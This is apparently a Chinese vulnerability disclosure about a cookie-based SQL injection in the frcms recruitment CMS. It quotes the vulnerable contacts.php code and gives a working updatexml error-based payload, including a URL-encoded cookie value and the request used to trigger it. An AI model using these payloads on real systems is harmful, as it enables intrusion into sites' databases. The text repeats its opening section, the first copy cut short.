### 简要描述: rt ### 详细说明: 看到看到frcms\inc\ contacts.php ``` if($companyid!=0){ if($hireid!=0){ $db ->query("update {$cfg['tb_pre']}hire set h_visitcount=h_visitcount+1 where h_id=$hireid and h_comid=$companyid"); $goto=$cfg['path']."co/hire.php?id=$hireid"; $rs = $db->get_one("select h_place,h_address,h_post,h_contact,h_telshowflag,h_tel,h_fax,h_emailshowflag,h_email,h_member,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}hire INNER JOIN {$cfg['tb_pre']}member on h_comid=m_id where h_id=$hireid and h_comid=$companyid"); if($rs){ $Complace=$rs['h_place'];$Comaddress=$rs['h_address'];$Compost=$rs['h_post'];$Comcontact=$rs['h_contact']; $Comtelshowflag=$rs['h_telshowflag'];$Comtel=$rs['h_tel'];$Comfax=$rs['h_fax']; $Comemailshowflag=$rs['h_emailshowflag'];$Comemail=$rs['h_email'];$ComMemberlogin=$rs['h_member']; $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat']; }else{ echo "联系方式读取出错!";exit; } }else{ $db...
### 简要描述: rt ### 详细说明: 看到看到frcms\inc\ contacts.php ``` if($companyid!=0){ if($hireid!=0){ $db ->query("update {$cfg['tb_pre']}hire set h_visitcount=h_visitcount+1 where h_id=$hireid and h_comid=$companyid"); $goto=$cfg['path']."co/hire.php?id=$hireid"; $rs = $db->get_one("select h_place,h_address,h_post,h_contact,h_telshowflag,h_tel,h_fax,h_emailshowflag,h_email,h_member,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}hire INNER JOIN {$cfg['tb_pre']}member on h_comid=m_id where h_id=$hireid and h_comid=$companyid"); if($rs){ $Complace=$rs['h_place'];$Comaddress=$rs['h_address'];$Compost=$rs['h_post'];$Comcontact=$rs['h_contact']; $Comtelshowflag=$rs['h_telshowflag'];$Comtel=$rs['h_tel'];$Comfax=$rs['h_fax']; $Comemailshowflag=$rs['h_emailshowflag'];$Comemail=$rs['h_email'];$ComMemberlogin=$rs['h_member']; $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat']; }else{ echo "联系方式读取出错!";exit; } }else{ $db ->query("update {$cfg['tb_pre']}member set m_hits=m_hits+1 where m_id=$companyid"); $goto=$cfg['path']."co/company.php?id=$companyid"; $rs = $db->get_one("select m_address,m_post,m_contact,m_telshowflag,m_tel,m_fax,m_emailshowflag,m_email,m_mobile,m_mobileshowflag,m_url,m_chat from {$cfg['tb_pre']}member where m_id=$companyid"); if($rs){ $Comaddress=$rs['m_address'];$Compost=$rs['m_post'];$Comcontact=$rs['m_contact']; $Comtelshowflag=$rs['m_telshowflag'];$Comtel=$rs['m_tel'];$Comfax=$rs['m_fax']; $Comemailshowflag=$rs['m_emailshowflag'];$Comemail=$rs['m_email'];$ComMemberlogin=$rs['m_login']; $Commobile=$rs['m_mobile'];$Commobileshowflag=$rs['m_mobileshowflag'];$Comurl=$rs['m_url'];$Comchat=$rs['m_chat']; }else{ echo "联系方式读取出错!";exit; } } $member_name=_getcookie("user_name");$Show=0;$bid=$hireid!=0?$hireid:$companyid;$type=$hireid!=0?3:2; if($username==''){$member_login="访客";$member_name="访客";}else{$member_login=$username;} $db ->query("Insert into {$cfg['tb_pre']}rbrower(r_bid,r_bmember,r_member,r_adddate,r_name,r_type) values('$bid','$ComMemberlogin','$member_login',NOW(),'$member_name',$type)"); ``` 其中$member_name是从_getcookie("user_name")获得。然后进入了sql语句。 查看_getcookie函数 ``` function _getcookie($var) { global $cfg; $var = $cfg['cookie_pre'].$var; return isset($_COOKIE[$var]) ? $_COOKIE[$var] : ''; } ``` 查看全局文件也没发现对cookie的过滤。 然后注册一个真实名字为 ``` =1' updatexml(1,concat(0x7e,(user())),0) or'','1','1','1')# ``` 的用户。 [<img src="https://images.seebug.org/upload/201502/23200737a376f60a2437555608b3f3b763ce1e83.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/23200737a376f60a2437555608b3f3b763ce1e83.jpg) 入库之后去除了转义符 [<img src="https://images.seebug.org/upload/201502/2320091774591ef2269acf9222a716f7959481d9.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2320091774591ef2269acf9222a716f7959481d9.png) 然后访问 ``` http://127.0.0.1/frcms/inc/contacts.php?resumeid=1 ``` [<img src="https://images.seebug.org/upload/201502/23201009898cf75ae389e1ee6ce917e151fe5f97.jpg" alt="7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/23201009898cf75ae389e1ee6ce917e151fe5f97.jpg) 可以看到mysql已经报错。其中 ``` fr_user_name==%3D1%27+or+char%28%40%60%27%60%29+or+updatexml%281%2Cconcat%280x7e%2C%28user%28%29%29%29%2C0%29+or%27%27%2C%271%27%2C%271%27%2C%271%27%29%23 ``` 这时查看mysql的记录日志可以发现 [<img src="https://images.seebug.org/upload/201502/232014400fee2d09b2b6956b0a41cd077002ed0b.jpg" alt="9.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/232014400fee2d09b2b6956b0a41cd077002ed0b.jpg) 语句已经成功执行 然后根据我上个洞 [WooYun: 嘉缘人才系统最新版注入(无视防御)](http://www.wooyun.org/bugs/wooyun-2015-091024) > 可以知道该cms的mysql错误会储存在一个文件中,以及如何找到这个文件 [<img src="https://images.seebug.org/upload/201502/232013111d3463195422b0264c234fe77d8677c8.jpg" alt="8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/232013111d3463195422b0264c234fe77d8677c8.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201502/232014400fee2d09b2b6956b0a41cd077002ed0b.jpg" alt="9.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/232014400fee2d09b2b6956b0a41cd077002ed0b.jpg) [<img src="https://images.seebug.org/upload/201502/232013111d3463195422b0264c234fe77d8677c8.jpg" alt="8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/232013111d3463195422b0264c234fe77d8677c8.jpg)
